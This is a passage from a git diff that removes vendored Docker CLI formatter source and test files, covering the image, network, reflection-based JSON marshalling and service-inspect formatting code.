-		{imageContext{
-			i:      types.ImageSummary{},
-			digest: "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a",
-		}, "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", digestHeader, ctx.Digest},
-	}
-
-	for _, c := range cases {
-		ctx = c.imageCtx
-		v := c.call()
-		if strings.Contains(v, ",") {
-			compareMultipleValues(t, v, c.expValue)
-		} else if v != c.expValue {
-			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
-		}
-
-		h := ctx.FullHeader()
-		if h != c.expHeader {
-			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
-		}
-	}
-}
-
-func TestImageContextWrite(t *testing.T) {
-	unixTime := time.Now().AddDate(0, 0, -1).Unix()
-	expectedTime := time.Unix(unixTime, 0).String()
-
-	cases := []struct {
-		context  ImageContext
-		expected string
-	}{
-		// Errors
-		{
-			ImageContext{
-				Context: Context{
-					Format: "{{InvalidFunction}}",
-				},
-			},
-			`Template parsing error: template: :1: function "InvalidFunction" not defined
-`,
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: "{{nil}}",
-				},
-			},
-			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
-`,
-		},
-		// Table Format
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table", false, false),
-				},
-			},
-			`REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-image               tag1                imageID1            24 hours ago        0 B
-image               tag2                imageID2            24 hours ago        0 B
-<none>              <none>              imageID3            24 hours ago        0 B
-`,
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table {{.Repository}}", false, false),
-				},
-			},
-			"REPOSITORY\nimage\nimage\n<none>\n",
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table {{.Repository}}", false, true),
-				},
-				Digest: true,
-			},
-			`REPOSITORY          DIGEST
-image               sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
-image               <none>
-<none>              <none>
-`,
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table {{.Repository}}", true, false),
-				},
-			},
-			"REPOSITORY\nimage\nimage\n<none>\n",
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table", true, false),
-				},
-			},
-			"imageID1\nimageID2\nimageID3\n",
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table", false, true),
-				},
-				Digest: true,
-			},
-			`REPOSITORY          TAG                 DIGEST                                                                    IMAGE ID            CREATED             SIZE
-image               tag1                sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf   imageID1            24 hours ago        0 B
-image               tag2                <none>                                                                    imageID2            24 hours ago        0 B
-<none>              <none>              <none>                                                                    imageID3            24 hours ago        0 B
-`,
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table", true, true),
-				},
-				Digest: true,
-			},
-			"imageID1\nimageID2\nimageID3\n",
-		},
-		// Raw Format
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("raw", false, false),
-				},
-			},
-			fmt.Sprintf(`repository: image
-tag: tag1
-image_id: imageID1
-created_at: %s
-virtual_size: 0 B
-
-repository: image
-tag: tag2
-image_id: imageID2
-created_at: %s
-virtual_size: 0 B
-
-repository: <none>
-tag: <none>
-image_id: imageID3
-created_at: %s
-virtual_size: 0 B
-
-`, expectedTime, expectedTime, expectedTime),
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("raw", false, true),
-				},
-				Digest: true,
-			},
-			fmt.Sprintf(`repository: image
-tag: tag1
-digest: sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
-image_id: imageID1
-created_at: %s
-virtual_size: 0 B
-
-repository: image
-tag: tag2
-digest: <none>
-image_id: imageID2
-created_at: %s
-virtual_size: 0 B
-
-repository: <none>
-tag: <none>
-digest: <none>
-image_id: imageID3
-created_at: %s
-virtual_size: 0 B
-
-`, expectedTime, expectedTime, expectedTime),
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("raw", true, false),
-				},
-			},
-			`image_id: imageID1
-image_id: imageID2
-image_id: imageID3
-`,
-		},
-		// Custom Format
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("{{.Repository}}", false, false),
-				},
-			},
-			"image\nimage\n<none>\n",
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("{{.Repository}}", false, true),
-				},
-				Digest: true,
-			},
-			"image\nimage\n<none>\n",
-		},
-	}
-
-	for _, testcase := range cases {
-		images := []types.ImageSummary{
-			{ID: "imageID1", RepoTags: []string{"image:tag1"}, RepoDigests: []string{"image@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"}, Created: unixTime},
-			{ID: "imageID2", RepoTags: []string{"image:tag2"}, Created: unixTime},
-			{ID: "imageID3", RepoTags: []string{"<none>:<none>"}, RepoDigests: []string{"<none>@<none>"}, Created: unixTime},
-		}
-		out := bytes.NewBufferString("")
-		testcase.context.Output = out
-		err := ImageWrite(testcase.context, images)
-		if err != nil {
-			assert.Error(t, err, testcase.expected)
-		} else {
-			assert.Equal(t, out.String(), testcase.expected)
-		}
-	}
-}
-
-func TestImageContextWriteWithNoImage(t *testing.T) {
-	out := bytes.NewBufferString("")
-	images := []types.ImageSummary{}
-
-	contexts := []struct {
-		context  ImageContext
-		expected string
-	}{
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("{{.Repository}}", false, false),
-					Output: out,
-				},
-			},
-			"",
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table {{.Repository}}", false, false),
-					Output: out,
-				},
-			},
-			"REPOSITORY\n",
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("{{.Repository}}", false, true),
-					Output: out,
-				},
-			},
-			"",
-		},
-		{
-			ImageContext{
-				Context: Context{
-					Format: NewImageFormat("table {{.Repository}}", false, true),
-					Output: out,
-				},
-			},
-			"REPOSITORY          DIGEST\n",
-		},
-	}
-
-	for _, context := range contexts {
-		ImageWrite(context.context, images)
-		assert.Equal(t, out.String(), context.expected)
-		// Clean buffer
-		out.Reset()
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network.go b/vendor/github.com/docker/docker/cli/command/formatter/network.go
deleted file mode 100644
index 7fbad7d2ab..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/network.go
+++ /dev/null
@@ -1,117 +0,0 @@
-package formatter
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringid"
-)
-
-const (
-	defaultNetworkTableFormat = "table {{.ID}}\t{{.Name}}\t{{.Driver}}\t{{.Scope}}"
-
-	networkIDHeader = "NETWORK ID"
-	ipv6Header      = "IPV6"
-	internalHeader  = "INTERNAL"
-)
-
-// NewNetworkFormat returns a Format for rendering using a network Context
-func NewNetworkFormat(source string, quiet bool) Format {
-	switch source {
-	case TableFormatKey:
-		if quiet {
-			return defaultQuietFormat
-		}
-		return defaultNetworkTableFormat
-	case RawFormatKey:
-		if quiet {
-			return `network_id: {{.ID}}`
-		}
-		return `network_id: {{.ID}}\nname: {{.Name}}\ndriver: {{.Driver}}\nscope: {{.Scope}}\n`
-	}
-	return Format(source)
-}
-
-// NetworkWrite writes the context
-func NetworkWrite(ctx Context, networks []types.NetworkResource) error {
-	render := func(format func(subContext subContext) error) error {
-		for _, network := range networks {
-			networkCtx := &networkContext{trunc: ctx.Trunc, n: network}
-			if err := format(networkCtx); err != nil {
-				return err
-			}
-		}
-		return nil
-	}
-	return ctx.Write(&networkContext{}, render)
-}
-
-type networkContext struct {
-	HeaderContext
-	trunc bool
-	n     types.NetworkResource
-}
-
-func (c *networkContext) MarshalJSON() ([]byte, error) {
-	return marshalJSON(c)
-}
-
-func (c *networkContext) ID() string {
-	c.AddHeader(networkIDHeader)
-	if c.trunc {
-		return stringid.TruncateID(c.n.ID)
-	}
-	return c.n.ID
-}
-
-func (c *networkContext) Name() string {
-	c.AddHeader(nameHeader)
-	return c.n.Name
-}
-
-func (c *networkContext) Driver() string {
-	c.AddHeader(driverHeader)
-	return c.n.Driver
-}
-
-func (c *networkContext) Scope() string {
-	c.AddHeader(scopeHeader)
-	return c.n.Scope
-}
-
-func (c *networkContext) IPv6() string {
-	c.AddHeader(ipv6Header)
-	return fmt.Sprintf("%v", c.n.EnableIPv6)
-}
-
-func (c *networkContext) Internal() string {
-	c.AddHeader(internalHeader)
-	return fmt.Sprintf("%v", c.n.Internal)
-}
-
-func (c *networkContext) Labels() string {
-	c.AddHeader(labelsHeader)
-	if c.n.Labels == nil {
-		return ""
-	}
-
-	var joinLabels []string
-	for k, v := range c.n.Labels {
-		joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v))
-	}
-	return strings.Join(joinLabels, ",")
-}
-
-func (c *networkContext) Label(name string) string {
-	n := strings.Split(name, ".")
-	r := strings.NewReplacer("-", " ", "_", " ")
-	h := r.Replace(n[len(n)-1])
-
-	c.AddHeader(h)
-
-	if c.n.Labels == nil {
-		return ""
-	}
-	return c.n.Labels[name]
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go
deleted file mode 100644
index b40a534eed..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go
+++ /dev/null
@@ -1,208 +0,0 @@
-package formatter
-
-import (
-	"bytes"
-	"encoding/json"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestNetworkContext(t *testing.T) {
-	networkID := stringid.GenerateRandomID()
-
-	var ctx networkContext
-	cases := []struct {
-		networkCtx networkContext
-		expValue   string
-		expHeader  string
-		call       func() string
-	}{
-		{networkContext{
-			n:     types.NetworkResource{ID: networkID},
-			trunc: false,
-		}, networkID, networkIDHeader, ctx.ID},
-		{networkContext{
-			n:     types.NetworkResource{ID: networkID},
-			trunc: true,
-		}, stringid.TruncateID(networkID), networkIDHeader, ctx.ID},
-		{networkContext{
-			n: types.NetworkResource{Name: "network_name"},
-		}, "network_name", nameHeader, ctx.Name},
-		{networkContext{
-			n: types.NetworkResource{Driver: "driver_name"},
-		}, "driver_name", driverHeader, ctx.Driver},
-		{networkContext{
-			n: types.NetworkResource{EnableIPv6: true},
-		}, "true", ipv6Header, ctx.IPv6},
-		{networkContext{
-			n: types.NetworkResource{EnableIPv6: false},
-		}, "false", ipv6Header, ctx.IPv6},
-		{networkContext{
-			n: types.NetworkResource{Internal: true},
-		}, "true", internalHeader, ctx.Internal},
-		{networkContext{
-			n: types.NetworkResource{Internal: false},
-		}, "false", internalHeader, ctx.Internal},
-		{networkContext{
-			n: types.NetworkResource{},
-		}, "", labelsHeader, ctx.Labels},
-		{networkContext{
-			n: types.NetworkResource{Labels: map[string]string{"label1": "value1", "label2": "value2"}},
-		}, "label1=value1,label2=value2", labelsHeader, ctx.Labels},
-	}
-
-	for _, c := range cases {
-		ctx = c.networkCtx
-		v := c.call()
-		if strings.Contains(v, ",") {
-			compareMultipleValues(t, v, c.expValue)
-		} else if v != c.expValue {
-			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
-		}
-
-		h := ctx.FullHeader()
-		if h != c.expHeader {
-			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
-		}
-	}
-}
-
-func TestNetworkContextWrite(t *testing.T) {
-	cases := []struct {
-		context  Context
-		expected string
-	}{
-
-		// Errors
-		{
-			Context{Format: "{{InvalidFunction}}"},
-			`Template parsing error: template: :1: function "InvalidFunction" not defined
-`,
-		},
-		{
-			Context{Format: "{{nil}}"},
-			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
-`,
-		},
-		// Table format
-		{
-			Context{Format: NewNetworkFormat("table", false)},
-			`NETWORK ID          NAME                DRIVER              SCOPE
-networkID1          foobar_baz          foo                 local
-networkID2          foobar_bar          bar                 local
-`,
-		},
-		{
-			Context{Format: NewNetworkFormat("table", true)},
-			`networkID1
-networkID2
-`,
-		},
-		{
-			Context{Format: NewNetworkFormat("table {{.Name}}", false)},
-			`NAME
-foobar_baz
-foobar_bar
-`,
-		},
-		{
-			Context{Format: NewNetworkFormat("table {{.Name}}", true)},
-			`NAME
-foobar_baz
-foobar_bar
-`,
-		},
-		// Raw Format
-		{
-			Context{Format: NewNetworkFormat("raw", false)},
-			`network_id: networkID1
-name: foobar_baz
-driver: foo
-scope: local
-
-network_id: networkID2
-name: foobar_bar
-driver: bar
-scope: local
-
-`,
-		},
-		{
-			Context{Format: NewNetworkFormat("raw", true)},
-			`network_id: networkID1
-network_id: networkID2
-`,
-		},
-		// Custom Format
-		{
-			Context{Format: NewNetworkFormat("{{.Name}}", false)},
-			`foobar_baz
-foobar_bar
-`,
-		},
-	}
-
-	for _, testcase := range cases {
-		networks := []types.NetworkResource{
-			{ID: "networkID1", Name: "foobar_baz", Driver: "foo", Scope: "local"},
-			{ID: "networkID2", Name: "foobar_bar", Driver: "bar", Scope: "local"},
-		}
-		out := bytes.NewBufferString("")
-		testcase.context.Output = out
-		err := NetworkWrite(testcase.context, networks)
-		if err != nil {
-			assert.Error(t, err, testcase.expected)
-		} else {
-			assert.Equal(t, out.String(), testcase.expected)
-		}
-	}
-}
-
-func TestNetworkContextWriteJSON(t *testing.T) {
-	networks := []types.NetworkResource{
-		{ID: "networkID1", Name: "foobar_baz"},
-		{ID: "networkID2", Name: "foobar_bar"},
-	}
-	expectedJSONs := []map[string]interface{}{
-		{"Driver": "", "ID": "networkID1", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_baz", "Scope": ""},
-		{"Driver": "", "ID": "networkID2", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_bar", "Scope": ""},
-	}
-
-	out := bytes.NewBufferString("")
-	err := NetworkWrite(Context{Format: "{{json .}}", Output: out}, networks)
-	if err != nil {
-		t.Fatal(err)
-	}
-	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
-		t.Logf("Output: line %d: %s", i, line)
-		var m map[string]interface{}
-		if err := json.Unmarshal([]byte(line), &m); err != nil {
-			t.Fatal(err)
-		}
-		assert.DeepEqual(t, m, expectedJSONs[i])
-	}
-}
-
-func TestNetworkContextWriteJSONField(t *testing.T) {
-	networks := []types.NetworkResource{
-		{ID: "networkID1", Name: "foobar_baz"},
-		{ID: "networkID2", Name: "foobar_bar"},
-	}
-	out := bytes.NewBufferString("")
-	err := NetworkWrite(Context{Format: "{{json .ID}}", Output: out}, networks)
-	if err != nil {
-		t.Fatal(err)
-	}
-	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
-		t.Logf("Output: line %d: %s", i, line)
-		var s string
-		if err := json.Unmarshal([]byte(line), &s); err != nil {
-			t.Fatal(err)
-		}
-		assert.Equal(t, s, networks[i].ID)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go
deleted file mode 100644
index d1d8737d21..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go
+++ /dev/null
@@ -1,65 +0,0 @@
-package formatter
-
-import (
-	"encoding/json"
-	"fmt"
-	"reflect"
-	"unicode"
-)
-
-func marshalJSON(x interface{}) ([]byte, error) {
-	m, err := marshalMap(x)
-	if err != nil {
-		return nil, err
-	}
-	return json.Marshal(m)
-}
-
-// marshalMap marshals x to map[string]interface{}
-func marshalMap(x interface{}) (map[string]interface{}, error) {
-	val := reflect.ValueOf(x)
-	if val.Kind() != reflect.Ptr {
-		return nil, fmt.Errorf("expected a pointer to a struct, got %v", val.Kind())
-	}
-	if val.IsNil() {
-		return nil, fmt.Errorf("expxected a pointer to a struct, got nil pointer")
-	}
-	valElem := val.Elem()
-	if valElem.Kind() != reflect.Struct {
-		return nil, fmt.Errorf("expected a pointer to a struct, got a pointer to %v", valElem.Kind())
-	}
-	typ := val.Type()
-	m := make(map[string]interface{})
-	for i := 0; i < val.NumMethod(); i++ {
-		k, v, err := marshalForMethod(typ.Method(i), val.Method(i))
-		if err != nil {
-			return nil, err
-		}
-		if k != "" {
-			m[k] = v
-		}
-	}
-	return m, nil
-}
-
-var unmarshallableNames = map[string]struct{}{"FullHeader": {}}
-
-// marshalForMethod returns the map key and the map value for marshalling the method.
-// It returns ("", nil, nil) for valid but non-marshallable parameter. (e.g. "unexportedFunc()")
-func marshalForMethod(typ reflect.Method, val reflect.Value) (string, interface{}, error) {
-	if val.Kind() != reflect.Func {
-		return "", nil, fmt.Errorf("expected func, got %v", val.Kind())
-	}
-	name, numIn, numOut := typ.Name, val.Type().NumIn(), val.Type().NumOut()
-	_, blackListed := unmarshallableNames[name]
-	// FIXME: In text/template, (numOut == 2) is marshallable,
-	//        if the type of the second param is error.
-	marshallable := unicode.IsUpper(rune(name[0])) && !blackListed &&
-		numIn == 0 && numOut == 1
-	if !marshallable {
-		return "", nil, nil
-	}
-	result := val.Call(make([]reflect.Value, numIn))
-	intf := result[0].Interface()
-	return name, intf, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go
deleted file mode 100644
index e547b18411..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go
+++ /dev/null
@@ -1,66 +0,0 @@
-package formatter
-
-import (
-	"reflect"
-	"testing"
-)
-
-type dummy struct {
-}
-
-func (d *dummy) Func1() string {
-	return "Func1"
-}
-
-func (d *dummy) func2() string {
-	return "func2(should not be marshalled)"
-}
-
-func (d *dummy) Func3() (string, int) {
-	return "Func3(should not be marshalled)", -42
-}
-
-func (d *dummy) Func4() int {
-	return 4
-}
-
-type dummyType string
-
-func (d *dummy) Func5() dummyType {
-	return dummyType("Func5")
-}
-
-func (d *dummy) FullHeader() string {
-	return "FullHeader(should not be marshalled)"
-}
-
-var dummyExpected = map[string]interface{}{
-	"Func1": "Func1",
-	"Func4": 4,
-	"Func5": dummyType("Func5"),
-}
-
-func TestMarshalMap(t *testing.T) {
-	d := dummy{}
-	m, err := marshalMap(&d)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if !reflect.DeepEqual(dummyExpected, m) {
-		t.Fatalf("expected %+v, got %+v",
-			dummyExpected, m)
-	}
-}
-
-func TestMarshalMapBad(t *testing.T) {
-	if _, err := marshalMap(nil); err == nil {
-		t.Fatal("expected an error (argument is nil)")
-	}
-	if _, err := marshalMap(dummy{}); err == nil {
-		t.Fatal("expected an error (argument is non-pointer)")
-	}
-	x := 42
-	if _, err := marshalMap(&x); err == nil {
-		t.Fatal("expected an error (argument is a pointer to non-struct)")
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/service.go b/vendor/github.com/docker/docker/cli/command/formatter/service.go
deleted file mode 100644
index aaa78386cb..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/service.go
+++ /dev/null
@@ -1,322 +0,0 @@
-package formatter
-
-import (
-	"fmt"
-	"strings"
-	"time"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli/command/inspect"
-	units "github.com/docker/go-units"
-)
-
-const serviceInspectPrettyTemplate Format = `
-ID:		{{.ID}}
-Name:		{{.Name}}
-{{- if .Labels }}
-Labels:
-{{- range $k, $v := .Labels }}
- {{ $k }}{{if $v }}={{ $v }}{{ end }}
-{{- end }}{{ end }}
-Service Mode:
-{{- if .IsModeGlobal }}	Global
-{{- else if .IsModeReplicated }}	Replicated
-{{- if .ModeReplicatedReplicas }}
- Replicas:	{{ .ModeReplicatedReplicas }}
-{{- end }}{{ end }}
-{{- if .HasUpdateStatus }}
-UpdateStatus:
- State:		{{ .UpdateStatusState }}
- Started:	{{ .UpdateStatusStarted }}
-{{- if .UpdateIsCompleted }}
- Completed:	{{ .UpdateStatusCompleted }}
-{{- end }}
- Message:	{{ .UpdateStatusMessage }}
-{{- end }}
-Placement:
-{{- if .TaskPlacementConstraints -}}
- Contraints:	{{ .TaskPlacementConstraints }}
-{{- end }}
-{{- if .HasUpdateConfig }}
-UpdateConfig:
- Parallelism:	{{ .UpdateParallelism }}
-{{- if .HasUpdateDelay}}
- Delay:		{{ .UpdateDelay }}
-{{- end }}
- On failure:	{{ .UpdateOnFailure }}
-{{- if .HasUpdateMonitor}}
- Monitoring Period: {{ .UpdateMonitor }}
-{{- end }}
- Max failure ratio: {{ .UpdateMaxFailureRatio }}
-{{- end }}
-ContainerSpec:
- Image:		{{ .ContainerImage }}
-{{- if .ContainerArgs }}
- Args:		{{ range $arg := .ContainerArgs }}{{ $arg }} {{ end }}
-{{- end -}}
-{{- if .ContainerEnv }}
- Env:		{{ range $env := .ContainerEnv }}{{ $env }} {{ end }}
-{{- end -}}
-{{- if .ContainerWorkDir }}
- Dir:		{{ .ContainerWorkDir }}
-{{- end -}}
-{{- if .ContainerUser }}
- User: {{ .ContainerUser }}
-{{- end }}
-{{- if .ContainerMounts }}
-Mounts:
-{{- end }}
-{{- range $mount := .ContainerMounts }}
-  Target = {{ $mount.Target }}
-   Source = {{ $mount.Source }}
-   ReadOnly = {{ $mount.ReadOnly }}
-   Type = {{ $mount.Type }}
-{{- end -}}
-{{- if .HasResources }}
-Resources:
-{{- if .HasResourceReservations }}
- Reservations:
-{{- if gt .ResourceReservationNanoCPUs 0.0 }}
-  CPU:		{{ .ResourceReservationNanoCPUs }}
-{{- end }}
-{{- if .ResourceReservationMemory }}
-  Memory:	{{ .ResourceReservationMemory }}
-{{- end }}{{ end }}
-{{- if .HasResourceLimits }}
- Limits:
-{{- if gt .ResourceLimitsNanoCPUs 0.0 }}
-  CPU:		{{ .ResourceLimitsNanoCPUs }}
-{{- end }}
-{{- if .ResourceLimitMemory }}
-  Memory:	{{ .ResourceLimitMemory }}
-{{- end }}{{ end }}{{ end }}
-{{- if .Networks }}
-Networks:
-{{- range $network := .Networks }} {{ $network }}{{ end }} {{ end }}
-Endpoint Mode:	{{ .EndpointMode }}
-{{- if .Ports }}
-Ports:
-{{- range $port := .Ports }}
- PublishedPort {{ $port.PublishedPort }}
-  Protocol = {{ $port.Protocol }}
-  TargetPort = {{ $port.TargetPort }}
-{{- end }} {{ end -}}
-`
-
-// NewServiceFormat returns a Format for rendering using a Context
-func NewServiceFormat(source string) Format {
-	switch source {
-	case PrettyFormatKey:
-		return serviceInspectPrettyTemplate
-	default:
-		return Format(strings.TrimPrefix(source, RawFormatKey))
-	}
-}
-
-// ServiceInspectWrite renders the context for a list of services
-func ServiceInspectWrite(ctx Context, refs []string, getRef inspect.GetRefFunc) error {
-	if ctx.Format != serviceInspectPrettyTemplate {
-		return inspect.Inspect(ctx.Output, refs, string(ctx.Format), getRef)
-	}
-	render := func(format func(subContext subContext) error) error {
-		for _, ref := range refs {
-			serviceI, _, err := getRef(ref)
-			if err != nil {
-				return err
-			}
-			service, ok := serviceI.(swarm.Service)
-			if !ok {
-				return fmt.Errorf("got wrong object to inspect")
-			}
-			if err := format(&serviceInspectContext{Service: service}); err != nil {
-				return err
-			}
-		}
-		return nil
-	}
-	return ctx.Write(&serviceInspectContext{}, render)
-}
-
-type serviceInspectContext struct {
-	swarm.Service
-	subContext
-}
-
-func (ctx *serviceInspectContext) MarshalJSON() ([]byte, error) {
-	return marshalJSON(ctx)
-}
-
-func (ctx *serviceInspectContext) ID() string {
-	return ctx.Service.ID
-}
-
-func (ctx *serviceInspectContext) Name() string {
-	return ctx.Service.Spec.Name
-}
-
-func (ctx *serviceInspectContext) Labels() map[string]string {
-	return ctx.Service.Spec.Labels
-}
-
-func (ctx *serviceInspectContext) IsModeGlobal() bool {
-	return ctx.Service.Spec.Mode.Global != nil
-}
-
-func (ctx *serviceInspectContext) IsModeReplicated() bool {
-	return ctx.Service.Spec.Mode.Replicated != nil
-}
-
-func (ctx *serviceInspectContext) ModeReplicatedReplicas() *uint64 {
-	return ctx.Service.Spec.Mode.Replicated.Replicas
-}
-
-func (ctx *serviceInspectContext) HasUpdateStatus() bool {
-	return ctx.Service.UpdateStatus.State != ""
-}
-
-func (ctx *serviceInspectContext) UpdateStatusState() swarm.UpdateState {
-	return ctx.Service.UpdateStatus.State
-}
-
-func (ctx *serviceInspectContext) UpdateStatusStarted() string {
-	return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.StartedAt))
-}
-
-func (ctx *serviceInspectContext) UpdateIsCompleted() bool {
-	return ctx.Service.UpdateStatus.State == swarm.UpdateStateCompleted
-}
-
-func (ctx *serviceInspectContext) UpdateStatusCompleted() string {
-	return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.CompletedAt))
-}
-
-func (ctx *serviceInspectContext) UpdateStatusMessage() string {
-	return ctx.Service.UpdateStatus.Message
-}
-
-func (ctx *serviceInspectContext) TaskPlacementConstraints() []string {
-	if ctx.Service.Spec.TaskTemplate.Placement != nil {
-		return ctx.Service.Spec.TaskTemplate.Placement.Constraints
-	}
-	return nil
-}
-
-func (ctx *serviceInspectContext) HasUpdateConfig() bool {
-	return ctx.Service.Spec.UpdateConfig != nil
-}
-
-func (ctx *serviceInspectContext) UpdateParallelism() uint64 {
-	return ctx.Service.Spec.UpdateConfig.Parallelism
-}
-
-func (ctx *serviceInspectContext) HasUpdateDelay() bool {
-	return ctx.Service.Spec.UpdateConfig.Delay.Nanoseconds() > 0
-}
-
-func (ctx *serviceInspectContext) UpdateDelay() time.Duration {
-	return ctx.Service.Spec.UpdateConfig.Delay
-}
-
-func (ctx *serviceInspectContext) UpdateOnFailure() string {
-	return ctx.Service.Spec.UpdateConfig.FailureAction
-}
-
-func (ctx *serviceInspectContext) HasUpdateMonitor() bool {
-	return ctx.Service.Spec.UpdateConfig.Monitor.Nanoseconds() > 0
-}
-
-func (ctx *serviceInspectContext) UpdateMonitor() time.Duration {
-	return ctx.Service.Spec.UpdateConfig.Monitor
-}
-
-func (ctx *serviceInspectContext) UpdateMaxFailureRatio() float32 {
-	return ctx.Service.Spec.UpdateConfig.MaxFailureRatio
-}
-
-func (ctx *serviceInspectContext) ContainerImage() string {
-	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Image
-}
-
-func (ctx *serviceInspectContext) ContainerArgs() []string {
-	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Args
-}
-
-func (ctx *serviceInspectContext) ContainerEnv() []string {
-	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Env
-}
-
-func (ctx *serviceInspectContext) ContainerWorkDir() string {
-	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Dir
-}
-
-func (ctx *serviceInspectContext) ContainerUser() string {
-	return ctx.Service.Spec.TaskTemplate.ContainerSpec.User
-}
-
-func (ctx *serviceInspectContext) ContainerMounts() []mounttypes.Mount {
-	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Mounts
-}
-
-func (ctx *serviceInspectContext) HasResources() bool {
-	return ctx.Service.Spec.TaskTemplate.Resources != nil
-}
-
-func (ctx *serviceInspectContext) HasResourceReservations() bool {
-	if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Reservations == nil {
-		return false
-	}
-	return ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes > 0
-}
-
-func (ctx *serviceInspectContext) ResourceReservationNanoCPUs() float64 {
-	if ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs == 0 {
-		return float64(0)
-	}
-	return float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs) / 1e9
-}
-
-func (ctx *serviceInspectContext) ResourceReservationMemory() string {
-	if ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes == 0 {
-		return ""
-	}
-	return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes))
-}
-
-func (ctx *serviceInspectContext) HasResourceLimits() bool {
-	if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Limits == nil {
-		return false
-	}
-	return ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes > 0
-}
-
-func (ctx *serviceInspectContext) ResourceLimitsNanoCPUs() float64 {
-	return float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs) / 1e9
-}
-
-func (ctx *serviceInspectContext) ResourceLimitMemory() string {
-	if ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes == 0 {
-		return ""
-	}
-	return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes))
-}
-
-func (ctx *serviceInspectContext) Networks() []string {
-	var out []string
-	for _, n := range ctx.Service.Spec.Networks {
-		out = append(out, n.Target)
-	}
-	return out
-}
-
-func (ctx *serviceInspectContext) EndpointMode() string {
-	if ctx.Service.Spec.EndpointSpec == nil {
-		return ""
-	}
-
-	return string(ctx.Service.Spec.EndpointSpec.Mode)
-}
-
-func (ctx *serviceInspectContext) Ports() []swarm.PortConfig {
-	return ctx.Service.Endpoint.Ports
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats.go b/vendor/github.com/docker/docker/cli/command/formatter/stats.go
deleted file mode 100644
index 7997f996d8..0000000000
